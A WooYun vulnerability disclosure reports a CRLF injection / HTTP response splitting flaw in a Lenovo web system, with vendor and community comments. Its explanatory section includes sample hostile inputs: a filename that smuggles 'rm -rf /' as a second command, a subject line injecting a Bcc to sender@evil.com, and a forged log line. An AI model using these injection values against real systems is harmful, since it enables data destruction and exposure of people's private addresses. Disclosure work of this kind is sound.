当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03073

漏洞标题:联想基础信息发布系统存在CRLF注入/HTTP响应分裂

相关厂商:联想

漏洞作者: zeracker

提交时间:2011-10-21 23:05

修复时间:2011-11-20 23:06

公开时间:2011-11-20 23:06

漏洞类型:CRLF注入/HTTP响应分裂

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-10-21: 细节已通知厂商并且等待厂商处理中
2011-10-25: 厂商已经确认,细节仅向厂商公开
2011-11-04: 细节向核心白帽子及相关领域专家公开
2011-11-14: 细节向普通白帽子公开
2011-11-24: 细节向实习白帽子公开
2011-11-20: 细节向公众公开

简要描述:

它是一个远程攻击者可能注入自定义HTTP标头。
攻击者可以注入会话cookie或HTML代码。
这可能进行的XSS(跨站点脚本)或会话固定漏洞。

详细说明:

URL编码的输入lang_id设置SomeCustomInjectedHeader:injected_by_wvs
注入头发现:
SomeCustomInjectedHeader:injected_by_wvs
HTTP标头结构“键:值”,其中每行由CRLF组合分离。
如果用户输入的值部分不正确转义/删除CRLF字符注入有可能改变了HTTP头结构。
HTTP响应拆分是一个新的应用程序的攻击技术,使各种新的攻击,如Web缓存中毒,跨用户涂改,劫持用户的敏感信息和XSS的网页。
攻击者发送一个HTTP请求,迫使Web服务器,以形成一个输出流,然后将其解释为两个HTTP响应,而不是一个响应目标。
攻击者在搜索安全漏洞的时候没有忽略很少使用的CRLF.攻击者可以通过在一段数据中加入CRLF命令来改变接受这个数据的应用程序处理这个数据的方式,从而执行CFRL注入攻击。
CRLF攻击最基本的例子包括向记录文件中增加伪造的记录。也就是说,有安全漏洞的应用程序把一个用户输入的内容写到系统记录文件中。攻击者可以提供如下输入内容:
Testing123MYSQL DATABASE ERROR: TABLE CORRUPTION
当系统管理员在早上查看他的纪录时,他可能会用很多时间排除一个根本就不存在的故障。狡猾的攻击者在攻击系统的另一部分时,可以使用这种特洛伊木马分散管理员的注意力。
想像一下,一个应用程序收到用户输入的一个文件名,然后对那个文件执行一个指令,如“ls -a .”。如果这个应用程序存在CRLF安全漏洞,攻击者就可以输入这样的内容:
File.txtrm -rf /
这个有安全漏洞的应用程序就会执行这个命令“ls -a File.txt”,然后再执行这个命令“rm -rf /”。如果这个应用程序是一个根程序,这可能就是它执行的最后一个命令,因为在根分区的全部文件都被删除了。
考虑使用一种CRFL注入攻击暴露使用一种基于网络的匿名电子邮件系统的某个人的电子邮件地址。那个电子邮件系统的工作方式可能是这样的:电子邮件的发送者用他们的电子邮件地址、信息主题和信息本身填写一个表格。当这个表格递交到网络服务器上的时候,网络服务器把这个表格转换为一个SMTP电子邮件,并且发送给收件人。发送者永远不会看到收件人的电子邮件地址。这个地址只有服务器知道。
如果这个应用程序存在CRLF攻击安全漏洞,电子邮件的发件人可以通过创建下面这样的一行主题来破坏收件人的匿名性:
Subject: Peekaboo, I see youBcc: sender@evil.com
当有安全漏洞的应用程序得到这个数据的时候,它向这个邮件的文件头增加一个不需要的行,创建一个发送到发件人邮件地址的这封邮件的盲送副本。在这个副本中,“To:”地址是看不到的,因此把收件人的邮件地址暴露给发送者。

漏洞证明:

http//ips.lenovo.com.cn/loginByPeopleAction.do
攻击者可以注入会话Cookie或HTML代码。这种行为可能导致跨站脚本攻击固定会话攻击
问题是否严重,请自行检查,每一个细节都可能为攻击者创造机会。

修复方案:


可参考下文了解危害性:
http://netsecurity.51cto.com/art/201009/225806.htm
http://baike.baidu.com/view/1157566.htm

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2011-10-25 14:30

厂商回复:

具体有什么影响?能描述一下可能的攻击场景吗?多谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2011-10-21 23:07 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    修复方案:您需要限制用户输入CR(0x13)和LF(为0x10)或正确编码的输出,以防止自定义HTTP标头注射。网络太卡了,提交快了。

  2. 2011-10-22 01:35 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这是神马新款扫描器

  3. 2011-10-22 01:45 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这样没意义的 少年

  4. 2011-10-22 01:47 | 木木 ( 路人 | Rank:15 漏洞数:4 | 扯淡的人生。)

    这是zeracker网站专杀工具,强大!

  5. 2011-10-22 01:55 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    类似的crlf注入,我是找相关的问题看的。什么跟什么?详细说明是借用相关的一些资料参考的。

  6. 2011-10-25 14:38 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    厂商回答得好

  7. 2011-10-25 15:09 | Pnig0s ( 实习白帽子 | Rank:46 漏洞数:2 | The quiter you are,the more you're able ...)

    貌似没有什么太大影响 是Http spliting吧~牛逼到极点能注入~平时只能自己构造哥HeaderYY一下下了~

  8. 2011-10-25 18:21 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    还有个分站,xss sql 上传漏洞啥都有,要提权描述?

  9. 2012-09-01 13:27 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @xsser 不已数据为目的的东西 就是耍流氓。